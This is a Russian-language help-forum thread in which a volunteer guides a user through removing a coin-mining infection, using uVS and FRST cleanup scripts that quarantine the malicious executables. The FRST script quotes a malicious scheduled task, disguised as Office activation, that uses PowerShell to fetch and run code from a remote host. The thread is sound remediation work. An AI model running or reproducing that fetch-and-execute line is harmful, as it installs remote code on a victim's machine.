Tool.BtcMine.2794

[GrayGrain]

Поймал майнинговый вирус, Cureit не помогает, если лечить/удалять/перемещатьCollectionLog-2025.05.29-00.41.zip

[safety]

Сделайте дополнительно образ автозапуска в uVS с отслеживанием процессов и задач:

Если антивирус будет блокировать запуск, или получение файла образа - временно отключите защиту антивируса.

 

1. Скачайте архив с актуальной версией утилиты uVS c зеркала программы отсюда (1) (здесь дополнительно встроен архиватор 7zip), распакуйте данный архив с программой в отдельный каталог.

2. запустите из каталога с модулями uVS файл Start.exe
(для Vista, W7- W11 выберите запуск от имени Администратора)
3. В стартовом окне программы - нажать "запустить под текущим пользователем". (если текущий пользователь с правами локального администратора)

3.1 Если запросили обычный образ автозапуска, переходим сразу к п.4
Если запросили образ автозапуска с отслеживанием процессов и задач:
В главном меню выбираем "Дополнительно" - Твики" - нажимаем "твик 39" и перегружаем систему. После перезагрузки переходим к п.2 и выполняем все действия из 2, 3, 4, 5, 6.

4. Далее, меню "Файл" / Сохранить Полный образ автозапуска.

 

5. Дождитесь, пока процесс создания файла образа завершится.
Сохраненный файл образа автозапуска (с именем Ваш_компьютер_дата_время*.txt) автоматически добавится в архив 7z. (если используется uVS из зеркала со встроенным архиватором 7z)

[GrayGrain]

Всё выполнил по инструкции COMPUTER_2025-05-29_19-14-00_v5.0.RC2.v x64.7z

Изменено Четверг в 16:15 пользователем GrayGrain

[safety]

Выполните очистку системы

 

По очистке системы в uVS

Выполните скрипт очистки в uVS

Выполните в uVS скрипт из буфера обмена.

ЗАпускаем start,exe от имени Администратора (если не запущен)

текущий пользователь,

Копируем скрипт ниже из браузера в буфер обмена. Закрываем браузер.

В главном меню uVS выбираем: "Скрипт - выполнить скрипт из буфера обмена"

Скрипт автоматически очистит систему и завершит работу с перезагрузкой системы.

;uVS v5.0.RC2.v x64 [http://dsrt.dyndns.org:8888]
;Target OS: NTv11.0
v400c
OFFSGNSAVE
;------------------------autoscript---------------------------

zoo %SystemDrive%\PROGRAMDATA\WINAIHSERVICE\WINAIHSERVICE.EXE
addsgn 0DC977BA156A4C720BD4AEB164C81205258AFCF689FA1F7885C3C5BC50D6714C2117D3573E55BD492B009C9F461671FA7D5FE87255DAB02C2D77A42FC7062273 33 Win32/Wacapew.C!ml [Microsoft] 7

zoo %SystemDrive%\PROGRAMDATA\WINAIHSERVICE\WINSERVICENETWORKING.EXE
addsgn A1BA20CF1DE779D7F38551F9E97612154373B47B0EAAC13B823CF57B505E29057E4794EF22B8DA4E7BC80D7E0E9FB3B2F428564D5274B07965FE416B4C0F6BFA 8 Win64/CoinMiner.PM 7

chklst
delvir

apply

deltmp
delref {E984D939-0E00-4DD9-AC3A-7ACA04745521}\[CLSID]
delref {8702A841-D5CA-47C3-812D-9CEDC304C200}\[CLSID]
delref %SystemDrive%\PROGRAM FILES\NEFARIUS SOFTWARE SOLUTIONS\NEFARIUS VIRTUALPAD DRIVER RUNTIME\NEFARIUSVIRTUALPADDRIVERSERVICEUPDATER.EXE
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {88D969C0-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C1-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C2-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C3-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C4-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C5-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {8AD9C840-044E-11D1-B3E9-00805F499D93}\[CLSID]
delref {CA8A9780-280D-11CF-A24D-444553540000}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
delref {1FBA04EE-3024-11D2-8F1F-0000F87ABD16}\[CLSID]
delref {0F8604A5-4ECE-4DE1-BA7D-CF10F8AA4F48}\[CLSID]
delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\[CLSID]
delref %SystemDrive%\USERS\SEREG\ONEDRIVE\РАБОЧИЙ СТОЛ\ZAPRET-DISCORD-YOUTUBE-MAIN\BIN\WINWS.EXE
delref %SystemDrive%\USERS\SEREG\ONEDRIVE\РАБОЧИЙ СТОЛ\ZAPRET-DISCORD-YOUTUBE-MAIN\BIN\QUIC_INITIAL_WWW_GOOGLE_COM.BIN
delref %SystemDrive%\USERS\SEREG\ONEDRIVE\РАБОЧИЙ СТОЛ\ZAPRET-DISCORD-YOUTUBE-MAIN\BIN\TLS_CLIENTHELLO_WWW_GOOGLE_COM.BIN
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\121.0.6167.185\RESOURCES\WEB_STORE\WEB STORE
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\121.0.6167.185\RESOURCES\PDF\CHROME PDF VIEWER
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\121.0.6167.185\RESOURCES\NETWORK_SPEECH_SYNTHESIS\GOOGLE NETWORK SPEECH
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\134.0.6998.89\RESOURCES\HANGOUT_SERVICES\GOOGLE HANGOUTS
delref %SystemDrive%\USERS\SEREG\APPDATA\LOCAL\YANDEX\YANDEXBROWSER\APPLICATION\24.12.2.856\RESOURCES\WEB_STORE\МАГАЗИН ПРИЛОЖЕНИЙ
delref %SystemDrive%\USERS\SEREG\APPDATA\LOCAL\YANDEX\YANDEXBROWSER\APPLICATION\24.12.2.856\RESOURCES\YANDEX\BOOK_READER\BOOKREADER
delref %SystemDrive%\USERS\SEREG\APPDATA\LOCAL\YANDEX\YANDEXBROWSER\APPLICATION\24.12.2.856\RESOURCES\OPERA_STORE\OPERA STORE
delref %SystemDrive%\USERS\SEREG\APPDATA\LOCAL\YANDEX\YANDEXBROWSER\APPLICATION\24.12.2.856\RESOURCES\PDF\CHROMIUM PDF VIEWER
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\121.0.2277.112\RESOURCES\WEB_STORE\ИНТЕРНЕТ-МАГАЗИН
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\121.0.2277.112\RESOURCES\EDGE_CLIPBOARD\MICROSOFT CLIPBOARD EXTENSION
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\121.0.2277.112\RESOURCES\EDGE_SUPPRESS_CONSENT_PROMPT\SUPPRESS CONSENT PROMPT
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\121.0.2277.112\RESOURCES\MEDIA_INTERNALS_SERVICES\MEDIA INTERNALS SERVICES EXTENSION
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\121.0.2277.112\RESOURCES\MICROSOFT_WEB_STORE\MICROSOFT STORE
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\121.0.2277.112\RESOURCES\EDGE_FEEDBACK\EDGE FEEDBACK
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\121.0.2277.112\RESOURCES\MICROSOFT_VOICES\MICROSOFT VOICES
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\121.0.2277.112\RESOURCES\EDGE_PDF\MICROSOFT EDGE PDF VIEWER
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\121.0.2277.112\RESOURCES\WEBRTC_INTERNALS\WEBRTC INTERNALS EXTENSION
delref D:\HISUITEDOWNLOADER.EXE
delref %SystemDrive%\PROGRAMDATA\WINAIHSERVICE\
delref %SystemDrive%\PROGRAMDATA\CAASERVICE\
;-------------------------------------------------------------

restart
czoo

После перезагрузки системы:

Добавьте файл дата_времяlog.txt из папки откуда запускали uVS

Файл ZOO*** из папки uVS прикрепите к вашему сообщению,

+

добавьте новые логи FRST для контроля

[GrayGrain]

Вроде как удалил, шума от вентиляторов карты нет и в процессах всё хорошо. Спасибо.

 

2025-05-30_17-49-14_log.txt Добавил файл дата_времяlog.txt из папки откуда запускали uVS
 

"Файл ZOO*** из папки uVS прикрепите к вашему сообщению" (фаил весит 11 МБ, не могу приложить) 
https://disk.yandex.ru/d/y5qBy3SmMAc2Wg выложил на яндекс диск

Addition.txtFRST.txt добавил новые логи FRST для контроля

 

[safety]

По очистке в FRST:

 

Выполните скрипт очистки в FRST

Запускаем FRST.exe от имени Администратора (если не запущен)

Копируем скрипт из браузера в буфер обмена, браузер закрываем.

Ждем, когда будет готов к работе,

Нажимаем в FRST кнопку "исправить".

Скрипт очистит систему, и завершит работу c перезагрузкой системы

Start::
Task: {CFB772AC-CEEC-414A-8BF0-23A6A92E03B2} - System32\Tasks\Microsoft\Office\Office Persistent Activation => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [454656 2025-03-12] (Microsoft Windows -> Microsoft Corporation) -> -Command "irm hxxps://activate.techias.co.uk/ | iex" <==== ВНИМАНИЕ
GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
Reboot::
End::

После перезагрузки:

Добавьте файл Fixlog.txt из папки, откуда запускали FRST, в ваше сообщение

Понаблюдайте за работой системы, напишите по результату.

[GrayGrain]

Fixlog.txt
Всё успешно произвёл. Спасибо. 

[safety]

Если других вопросов или проблем в работе системы не осталось:

 

 Загрузите SecurityCheck by glax24 & Severnyj, https://safezone.cc/resources/security-check-by-glax24.25/ сохраните утилиту на Рабочем столе и извлеките из архива.
    Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратора
    Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
    Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
    Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
    Прикрепите этот файл к своему следующему сообщению.